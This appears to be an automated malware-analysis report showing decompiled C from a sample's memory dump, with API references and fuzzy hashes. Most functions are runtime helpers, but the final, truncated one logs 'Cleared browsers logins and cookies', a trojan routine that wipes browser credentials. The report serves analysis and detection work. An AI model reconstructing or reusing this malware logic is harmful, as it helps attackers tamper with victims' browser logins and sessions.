																				_t479 = _t477 + 0xc;
																				__eflags = _t290;
																				if(_t290 != 0) {
																					_t291 = _v712;
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					E0043698A();
																					asm("int3");
																					return  *0x46b508;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t296 = L0043DE25(_t364, _t391, _t432,  &_v708);
																						_t393 = _v712;
																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t393 = _v712;
																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
																						}
																					}
																					__eflags = _t364 - 2;
																					if(_t364 != 2) {
																						__eflags = _t364 - 1;
																						if(_t364 != 1) {
																							__eflags = _t364 - 5;
																							if(_t364 == 5) {
																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
																						}
																					} else {
																						_t457 = _v736;
																						_t425 = _t393;
																						_t403 = _t457;
																						 *(_t432 + 8) = _v716;
																						_v720 = _t457;
																						_v728 = _t457[8];
																						_v716 = _t457[9];
																						while(1) {
																							_t154 = _t432 + 8; // 0x8b56ff8b
																							__eflags =  *_t154 -  *_t403;
																							if( *_t154 ==  *_t403) {
																								break;
																							}
																							_t458 = _v720;
																							_t425 = _t425 + 1;
																							_t328 =  *_t403;
																							 *_t458 = _v728;
																							_v716 = _t403[1];
																							_t403 = _t458 + 8;
																							 *((intOrPtr*)(_t458 + 4)) = _v716;
																							_t364 = _v752;
																							_t457 = _v736;
																							_v728 = _t328;
																							_v720 = _t403;
																							__eflags = _t425 - 5;
																							if(_t425 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t425 - 5;
																							if(__eflags == 0) {
																								_t178 = _t432 + 8; // 0x8b56ff8b
																								_t319 = E004493AC(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x457410, 0x7f,  &_v536,  *_t178, 1);
																								_t479 = _t479 + 0x1c;
																								__eflags = _t319;
																								_t320 = _v712;
																								if(_t319 == 0) {
																									_t457[1] = _t320;
																								} else {
																									do {
																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t323 = E004337C1( &_v536,  *0x46a170, 0xfe);
																									_t479 = _t479 + 0xc;
																									__eflags = _t323;
																									_t457[1] = 0 | _t323 == 0x00000000;
																								}
																								_t193 = _t432 + 8; // 0x8b56ff8b
																								 *_t457 =  *_t193;
																							}
																							 *(_t432 + 0x18) = _t457[1];
																							goto L121;
																						}
																						__eflags = _t425;
																						if(_t425 != 0) {
																							 *_t457 =  *(_t457 + _t425 * 8);
																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
																							 *(_t457 + _t425 * 8) = _v728;
																							 *(_t457 + 4 + _t425 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					_t297 = _t364 * 0xc;
																					_t200 = _t297 + 0x457350; // 0x40dd8c
																					 *0x453474(_t432);
																					_t299 =  *((intOrPtr*)( *_t200))();
																					_t396 = _v732;
																					__eflags = _t299;
																					if(_t299 == 0) {
																						__eflags = _t396 - 0x46a2a8;
																						if(_t396 != 0x46a2a8) {
																							_t456 = _t364 + _t364;
																							__eflags = _t456;
																							asm("lock xadd [eax], ecx");
																							if(_t456 != 0) {
																								goto L126;
																							} else {
																								_t218 = _t456 * 8; // 0x30ff068b
																								E004401F5( *((intOrPtr*)(_t432 + _t218 + 0x28)));
																								_t221 = _t456 * 8; // 0x30ff0c46
																								E004401F5( *((intOrPtr*)(_t432 + _t221 + 0x24)));
																								_t224 = _t364 * 4; // 0xb94f
																								E004401F5( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
																								_t399 = _v712;
																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
																							}
																						}
																						_t397 = _v740;
																						 *_t397 = 1;
																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
																					} else {
																						 *(_v724 + _t432) = _t396;
																						_t205 = _t364 * 4; // 0xb94f
																						E004401F5( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
																						E004401F5(_v740);
																						 *(_t432 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			goto L85;
																		}
																		goto L130;
																	}
																	asm("sbb eax, eax");
																	_t282 = _t281 | 0x00000001;
																	__eflags = _t282;
																	goto L93;
																} else {
																	L84:
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t465;
																	return L0042FD1B(_v16 ^ _t465);
																}
															} else {
																_t330 = _t447 + _t447;
																__eflags = _t330 - 0x106;
																if(_t330 >= 0x106) {
																	L0042FE4F();
																	goto L82;
																} else {
																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
																	_t332 =  &_v276;
																	_push(_t332);
																	_push(_v460);
																	_push(_t428);
																	L83();
																	_t472 = _t475 + 0xc;
																	__eflags = _t332;
																	_t268 = _v452;
																	if(_t332 != 0) {
																		_t268 = _t268 + 1;
																		_v452 = _t268;
																	}
																	L54:
																	_t444 = _t359 + _t447 * 2;
																	_t370 = 0;
																	__eflags =  *_t444;
																	if( *_t444 == 0) {
																		L56:
																		__eflags = _t268;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																		}
																		goto L80;
																	} else {
																		_t444 = _t444 + 2;
																		__eflags =  *_t444;
																		if( *_t444 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t333 = 0x3b;
														__eflags =  *_t359 - _t333;
														if( *_t359 != _t333) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L130;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t444;
						if(_t444 != 0) {
							_push(_t444);
							_push(_t249);
							_push(_t428);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t463;
						return L0042FD1B(_v12 ^ _t463);
					}
				}
				L130:
			}

0x0043e550
0x0043e553
0x0043e555
0x0043e558
0x0043e559
0x0043e562
0x0043e56a
0x0043e56c
0x0043e56e
0x0043e571
0x0043e68a
0x0043e68f
0x0043e577
0x0043e577
0x0043e578
0x0043e578
0x0043e57b
0x0043e57e
0x0043e580
0x0043e583
0x0043e583
0x0043e586
0x0043e588
0x0043e58b
0x0043e590
0x0043e59e
0x0043e5a8
0x0043e5ab
0x0043e5ae
0x0043e5ae
0x0043e5b9
0x0043e5be
0x0043e5c3
0x00000000
0x0043e5c9
0x0043e5cc
0x0043e5cc
0x0043e5cf
0x0043e5d1
0x0043e5d4
0x0043e5d4
0x0043e5d4
0x0043e5d6
0x0043e5d6
0x0043e5d6
0x0043e5dc
0x00000000
0x00000000
0x0043e5e1
0x0043e5f8
0x0043e5f8
0x0043e5e3
0x0043e5e3
0x0043e5eb
0x00000000
0x0043e5ed
0x0043e5ed
0x0043e5f0
0x0043e5f6
0x00000000
0x00000000
0x00000000
0x00000000
0x0043e5f6
0x0043e5eb
0x0043e601
0x0043e606
0x0043e608
0x0043e60d
0x0043e610
0x0043e613
0x0043e616
0x0043e619
0x0043e61b
0x0043e620
0x0043e62a
0x0043e632
0x0043e63a
0x00000000
0x0043e640
0x0043e644
0x0043e691
0x0043e697
0x0043e69a
0x0043e69d
0x0043e69f
0x0043e6a3
0x0043e6a7
0x0043e6a9
0x0043e6ac
0x0043e6b1
0x0043e6a7
0x0043e6b2
0x0043e6b5
0x0043e6b7
0x0043e6b9
0x0043e6bd
0x0043e6be
0x0043e6c0
0x0043e6c3
0x0043e6c8
0x0043e6be
0x0043e6cb
0x0043e6ce
0x0043e6d1
0x0043e6d4
0x0043e6d7
0x0043e6d7
0x0043e646
0x0043e646
0x0043e649
0x0043e64c
0x0043e64e
0x0043e652
0x0043e656
0x0043e658
0x0043e65b
0x0043e660
0x0043e656
0x0043e661
0x0043e666
0x0043e668
0x0043e66d
0x0043e66f
0x0043e672
0x0043e677
0x0043e66d
0x0043e678
0x0043e67c
0x0043e67c
0x0043e67f
0x0043e683
0x0043e686
0x0043e686
0x00000000
0x0043e689
0x00000000
0x0043e63a
0x0043e5fc
0x0043e5fe
0x0043e5fe
0x00000000
0x0043e5fe
0x0043e6de
0x0043e6df
0x0043e6e0
0x0043e6e1
0x0043e6e2
0x0043e6e3
0x0043e6e8
0x0043e6eb
0x0043e6ec
0x0043e6ee
0x0043e6f4
0x0043e6fb
0x0043e6fe
0x0043e701
0x0043e702
0x0043e703
0x0043e706
0x0043e707
0x0043e70a
0x0043e710
0x0043e712
0x0043e737
0x0043e741
0x0043e747
0x0043e749
0x0043e74f
0x0043e751
0x0043e9a4
0x0043e9a5
0x00000000
0x0043e757
0x0043e757
0x0043e75b
0x0043e8c2
0x0043e8c2
0x0043e8d9
0x0043e8de
0x0043e8e1
0x0043e8e3
0x0043e8e9
0x0043e8e9
0x0043e8eb
0x0043e8eb
0x0043e8ee
0x0043e8f0
0x0043e8f6
0x0043e8f6
0x0043e8f8
0x0043e97f
0x0043e97f
0x0043e8fe
0x0043e8fe
0x0043e900
0x0043e906
0x0043e909
0x0043e90c
0x0043e912
0x00000000
0x00000000
0x0043e914
0x0043e918
0x0043e941
0x0043e941
0x0043e943
0x0043e91a
0x0043e91a
0x0043e91e
0x0043e922
0x0043e929
0x0043e92f
0x00000000
0x0043e931
0x0043e931
0x0043e934
0x0043e937
0x0043e93f
0x00000000
0x00000000
0x00000000
0x00000000
0x0043e93f
0x0043e92f
0x0043e94e
0x0043e94e
0x0043e950
0x0043e97e
0x0043e97e
0x00000000
0x0043e952
0x0043e952
0x0043e958
0x0043e959
0x0043e95a
0x0043e95b
0x0043e960
0x0043e966
0x0043e969
0x0043e96b
0x0043e972
0x0043e974
0x0043e976
0x0043e96d
0x0043e96d
0x0043e96e
0x00000000
0x0043e96e
0x0043e96b
0x00000000
0x0043e950
0x0043e947
0x0043e949
0x0043e94c
0x0043e94c
0x00000000
0x0043e94c
0x0043e985
0x0043e985
0x0043e986
0x0043e989
0x0043e98f
0x0043e98f
0x0043e998
0x0043e99a
0x00000000
0x0043e99c
0x0043e99c
0x00000000
0x0043e99c
0x0043e99a
0x00000000
0x0043e761
0x0043e761
0x0043e766
0x00000000
0x0043e76c
0x0043e76c
0x0043e771
0x00000000
0x0043e777
0x0043e777
0x0043e77d
0x0043e782
0x0043e784
0x0043e78b
0x0043e78c
0x0043e78e
0x00000000
0x00000000
0x0043e794
0x0043e794
0x0043e798
0x0043e79e
0x00000000
0x0043e7a4
0x0043e7a6
0x0043e7a7
0x0043e7aa
0x00000000
0x0043e7b0
0x0043e7b0
0x0043e7b6
0x0043e7bb
0x0043e7c5
0x0043e7c9
0x0043e7ce
0x0043e7d1
0x0043e7d3
0x00000000
0x0043e7d5
0x0043e7d5
0x0043e7d7
0x0043e7da
0x0043e7da
0x0043e7dd
0x0043e7e0
0x0043e7e0
0x0043e7eb
0x0043e7ed
0x0043e7ef
0x00000000
0x00000000
0x0043e7ef
0x00000000
0x0043e7f1
0x0043e7f1
0x0043e7f7
0x0043e7fa
0x0043e7fa
0x0043e808
0x0043e811
0x0043e816
0x0043e81c
0x0043e81f
0x0043e820
0x0043e822
0x0043e830
0x0043e830
0x0043e837
0x0043e898
0x00000000
0x0043e839
0x0043e839
0x0043e847
0x0043e84c
0x0043e84f
0x0043e851
0x0043e9c1
0x0043e9c3
0x0043e9c4
0x0043e9c5
0x0043e9c6
0x0043e9c7
0x0043e9c8
0x0043e9cd
0x0043e9d0
0x0043e9d1
0x0043e9d9
0x0043e9e0
0x0043e9e3
0x0043e9e4
0x0043e9e7
0x0043e9eb
0x0043e9ec
0x0043e9ef
0x0043e9ff
0x0043ea0b
0x0043ea22
0x0043ea27
0x0043ea2a
0x0043ea2c
0x0043ea41
0x0043ea44
0x0043ea44
0x0043ea47
0x0043ea4d
0x0043ea56
0x0043ea58
0x0043ea5b
0x0043ea62
0x0043ea65
0x0043ea6b
0x00000000
0x00000000
0x0043ea6d
0x0043ea71
0x0043ea9a
0x0043ea9a
0x0043ea73
0x0043ea73
0x0043ea77
0x0043ea7b
0x0043ea82
0x0043ea88
0x00000000
0x0043ea8a
0x0043ea8a
0x0043ea8d
0x0043ea90
0x0043ea98
0x00000000
0x00000000
0x00000000
0x00000000
0x0043ea98
0x0043ea88
0x0043eaa7
0x0043eaa7
0x0043eaa9
0x0043eaaf
0x0043eab5
0x0043eab8
0x0043eab8
0x0043eabb
0x0043eabe
0x0043eabe
0x0043eace
0x0043eadc
0x0043eae1
0x0043eae8
0x0043eaea
0x00000000
0x0043eaf0
0x0043eaf6
0x0043eafc
0x0043eb03
0x0043eb09
0x0043eb0c
0x0043eb12
0x0043eb1f
0x0043eb26
0x0043eb2b
0x0043eb2e
0x0043eb30
0x0043ed89
0x0043ed8f
0x0043ed90
0x0043ed91
0x0043ed92
0x0043ed93
0x0043ed94
0x0043ed99
0x0043ed9f
0x0043eb36
0x0043eb36
0x0043eb44
0x0043eb47
0x0043eb62
0x0043eb69
0x0043eb6f
0x0043eb75
0x0043eb49
0x0043eb49
0x0043eb51
0x00000000
0x0043eb53
0x0043eb53
0x0043eb59
0x0043eb59
0x0043eb51
0x0043eb7c
0x0043eb7f
0x0043ec9c
0x0043ec9f
0x0043ecac
0x0043ecaf
0x0043ecb7
0x0043ecb7
0x0043eca1
0x0043eca7
0x0043eca7
0x0043eb85
0x0043eb85
0x0043eb8b
0x0043eb93
0x0043eb95
0x0043eb98
0x0043eba1
0x0043ebaa
0x0043ebb0
0x0043ebb0
0x0043ebb3
0x0043ebb5
0x00000000
0x00000000
0x0043ebb7
0x0043ebbd
0x0043ebbe
0x0043ebc9
0x0043ebd1
0x0043ebd9
0x0043ebdc
0x0043ebdf
0x0043ebe5
0x0043ebeb
0x0043ebf1
0x0043ebf7
0x0043ebfa
0x00000000
0x00000000
0x0043ebfc
0x0043ec21
0x0043ec21
0x0043ec24
0x0043ec28
0x0043ec41
0x0043ec46
0x0043ec49
0x0043ec4b
0x0043ec51
0x0043ec8c
0x0043ec53
0x0043ec53
0x0043ec58
0x0043ec60
0x0043ec61
0x0043ec61
0x0043ec78
0x0043ec7f
0x0043ec82
0x0043ec87
0x0043ec87
0x0043ec8f
0x0043ec92
0x0043ec92
0x0043ec97
0x00000000
0x0043ec97
0x0043ebfe
0x0043ec00
0x0043ec05
0x0043ec0b
0x0043ec14
0x0043ec1d
0x0043ec1d
0x00000000
0x0043ec00
0x0043ecba
0x0043ecba
0x0043ecbe
0x0043ecc6
0x0043eccc
0x0043eccf
0x0043ecd5
0x0043ecd7
0x0043ed17
0x0043ed1d
0x0043ed24
0x0043ed24
0x0043ed2a
0x0043ed2e
0x00000000
0x0043ed30
0x0043ed30
0x0043ed34
0x0043ed39
0x0043ed3d
0x0043ed42
0x0043ed49
0x0043ed57
0x0043ed5d
0x0043ed60
0x0043ed60
0x0043ed2e
0x0043ed6f
0x0043ed77
0x0043ed80
0x0043ecd9
0x0043ecdf
0x0043ece2
0x0043ece9
0x0043ecfb
0x0043ed02
0x0043ed0f
0x00000000
0x0043ed0f
0x00000000
0x0043ecd7
0x0043eb30
0x0043eaab
0x00000000
0x0043eaab
0x00000000
0x0043eaa9
0x0043eaa2
0x0043eaa4
0x0043eaa4
0x00000000
0x0043ea2e
0x0043ea2e
0x0043ea2e
0x0043ea30
0x0043ea35
0x0043ea40
0x0043ea40
0x0043e857
0x0043e857
0x0043e85a
0x0043e85f
0x0043e9bc
0x00000000
0x0043e865
0x0043e867
0x0043e86f
0x0043e875
0x0043e876
0x0043e87c
0x0043e87d
0x0043e882
0x0043e885
0x0043e887
0x0043e88d
0x0043e88f
0x0043e890
0x0043e890
0x0043e89e
0x0043e89e
0x0043e8a1
0x0043e8a3
0x0043e8a6
0x0043e8b4
0x0043e8b4
0x0043e99e
0x0043e99e
0x00000000
0x0043e9a0
0x0043e9a0
0x00000000
0x0043e8a8
0x0043e8a8
0x0043e8ab
0x0043e8ae
0x00000000
0x00000000
0x00000000
0x00000000
0x0043e8ae
0x0043e8a6
0x0043e85f
0x0043e851
0x0043e824
0x0043e826
0x0043e827
0x0043e82a
0x00000000
0x00000000
0x00000000
0x00000000
0x0043e82a
0x0043e822
0x0043e7aa
0x00000000
0x0043e79e
0x00000000
0x0043e8bb
0x0043e771
0x0043e766
0x0043e75b
0x0043e714
0x0043e714
0x0043e716
0x0043e718
0x0043e719
0x0043e71a
0x0043e71b
0x0043e720
0x0043e9ab
0x0043e9b0
0x0043e9bb
0x0043e9bb
0x0043e712
0x00000000

APIs

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

_free.LIBCMT ref: 0043E65B
_free.LIBCMT ref: 0043E672
_free.LIBCMT ref: 0043E691
_free.LIBCMT ref: 0043E6AC
_free.LIBCMT ref: 0043E6C3

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: e07bd57a6a9018179c59bd5e57d7895079224fa7f718c95e485c7130461bd9f2
Instruction ID: 9ca46151fc1eb59705b8745a81b868f81510b806d69f04cfdfe39fc5a4c1e60e
Opcode Fuzzy Hash: e07bd57a6a9018179c59bd5e57d7895079224fa7f718c95e485c7130461bd9f2
Instruction Fuzzy Hash: 2C51E371A02304AFDB20DF2BC842B6A77F4EF5C724F54156EE909D7290E739D9018B88

Uniqueness

Uniqueness Score: -1.00%

Function 0043D66D, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0043D66D(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x46a00c; // 0x1e1e4200
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E0043D52E( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E0042F09C(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0042F09C(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0042F09C(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = L00447D55(_t56);
						_t40 = E004401F5(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = L00447D55(_t56);
						E004401F5(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x46a00c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x0043d66d
0x0043d677
0x0043d67b
0x0043d67d
0x0043d681
0x0043d68b
0x0043d69c
0x0043d6a1
0x0043d6a3
0x0043d6a5
0x0043d6a7
0x0043d6a9
0x0043d6ad
0x0043d767
0x0043d775
0x0043d777
0x0043d77c
0x0043d783
0x0043d785
0x0043d793
0x0043d7a2
0x0043d7a5
0x0043d7a7
0x00000000
0x0043d7a8
0x0043d6b5
0x0043d6ba
0x0043d6bf
0x0043d6c1
0x0043d6c1
0x0043d6c3
0x0043d6c8
0x0043d6cc
0x0043d6cc
0x0043d6cf
0x0043d6ee
0x0043d6ee
0x0043d6f0
0x0043d6f3
0x0043d6fc
0x0043d6ff
0x0043d704
0x0043d707
0x0043d70c
0x00000000
0x00000000
0x0043d70e
0x00000000
0x0043d6d1
0x0043d6d1
0x0043d6d3
0x0043d6dc
0x0043d6df
0x0043d6e4
0x0043d6e7
0x0043d6ec
0x0043d716
0x0043d719
0x0043d71b
0x0043d71e
0x0043d726
0x0043d72c
0x0043d733
0x0043d735
0x0043d73d
0x0043d74c
0x0043d750
0x0043d752
0x0043d755
0x00000000
0x00000000
0x0043d757
0x0043d75a
0x0043d75c
0x0043d75c
0x0043d75d
0x0043d75f
0x0043d762
0x00000000
0x0043d75c
0x00000000
0x0043d6ec
0x0043d6cf
0x00000000

APIs

_free.LIBCMT ref: 0043D6DF
_free.LIBCMT ref: 0043D6FF

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
Instruction ID: f44f3642cdb3200b4d66470b3fc96812a0cc5a4b7e600cbe4d0621a0c6eb3eb9
Opcode Fuzzy Hash: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
Instruction Fuzzy Hash: 9A41D136E00200DBDB20DF78D881A5EB3B5EF89714F1545AEE615EB351EB35AD01CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004493AC, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004493AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x46a00c; // 0x1e1e4200
				_v8 = _t34 ^ _t70;
				E00435507(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return L0042FD1B(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						L00431F00(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00430BA0(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E0043F98C(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00450810();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x004493b4
0x004493bb
0x004493c7
0x004493cc
0x004493d1
0x004493d6
0x004493d9
0x004493db
0x004493db
0x004493e0
0x004493f9
0x004493ff
0x00449404
0x004494a3
0x004494a7
0x004494ac
0x004494ac
0x004494c8
0x004494c8
0x0044940a
0x00449412
0x00449416
0x00449462
0x00449464
0x00449466
0x0044946b
0x00449482
0x0044948a
0x0044949a
0x0044949a
0x0044948a
0x0044949c
0x0044949d
0x00000000
0x004494a2
0x0044941d
0x0044941f
0x00449421
0x00449429
0x00449446
0x00449450
0x00449455
0x00000000
0x00000000
0x00449457
0x0044945d
0x0044945d
0x00000000
0x0044945d
0x0044942d
0x00449431
0x00449436
0x0044943a
0x00000000
0x00000000
0x0044943c
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A), ref: 004493F9
__alloca_probe_16.LIBCMT ref: 00449431
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?), ref: 00449482
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?,00000002,?), ref: 00449494
__freea.LIBCMT ref: 0044949D

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 6cf54289371cfca82e40a991bdbc3284ee3587969fd39332f17aa6d682b16e01
Instruction ID: e49a694d908820c5dcacf8e8a5bbec85b76551c47cbf7292b4779bafd8218c50
Opcode Fuzzy Hash: 6cf54289371cfca82e40a991bdbc3284ee3587969fd39332f17aa6d682b16e01
Instruction Fuzzy Hash: 1231ED72A0020AABEF249F65DC41DAF7BA5EF00714F04412AFC08D7291E739DD52DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A523, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 103
sleepCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040A523(void* __edi) {
				char _v5;
				char _v6;
				char _v7;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t18;
				void* _t36;
				intOrPtr _t40;
				char _t50;
				void* _t52;
				signed int _t53;
				signed int _t54;
				void* _t55;

				_t52 = __edi;
				_t54 = _t53 & 0xfffffff8;
				 *0x46baf9 = 1;
				Sleep( *0x46baf4);
				_v7 = 0;
				_t36 = 0;
				_v6 = 0;
				_v5 = 0;
				goto L1;
				do {
					do {
						L1:
						_t59 = _t36;
						if(_t36 == 0) {
							L2:
							_t36 = E0040A409(_t59);
						}
						_t60 = _t36;
						if(_t36 == 0) {
							_t36 = E0040A22D(_t52, _t60);
						}
						_t61 = _v6;
						if(_v6 == 0) {
							_v6 = E0040A012(_t36, _t52, _t61);
						}
						_t62 = _v7;
						if(_v7 == 0) {
							_v7 = L00409F83(_t52, _t62);
						}
						_t50 = _v5;
						_t63 = _t50;
						if(_t50 == 0) {
							_t50 = L00409EF4(_t52, _t63);
							_v5 = _t50;
						}
						if(_t36 == 0 || _t36 == 0) {
							L16:
							Sleep(0x1388);
							_t18 = _v7;
							_t40 = _v6;
							_t50 = _v5;
						} else {
							_t18 = _v7;
							if(_t18 == 0 || _t50 == 0) {
								goto L16;
							} else {
								_t40 = _v6;
								if(_t40 == 0) {
									goto L16;
								}
							}
						}
						if(_t36 == 0) {
							goto L2;
						}
					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
					_t73 = _t40;
				} while (_t40 == 0);
				_t55 = _t54 - 0x18;
				E00402084(_t36, _t55, "\n[Cleared browsers logins and cookies.]\n");
				E0040A6EF(_t36, _t50, _t73);
				E00402084(_t36, _t55, "Cleared browsers logins and cookies.");
				_t56 = _t55 - 0x18;
				E00402084(_t36, _t55 - 0x18, "[Info]");
				L00416C80(_t36, _t52);
				E00402084(_t36, _t56 + 0x18, 0x45f6bc);
				_push(0xaf);
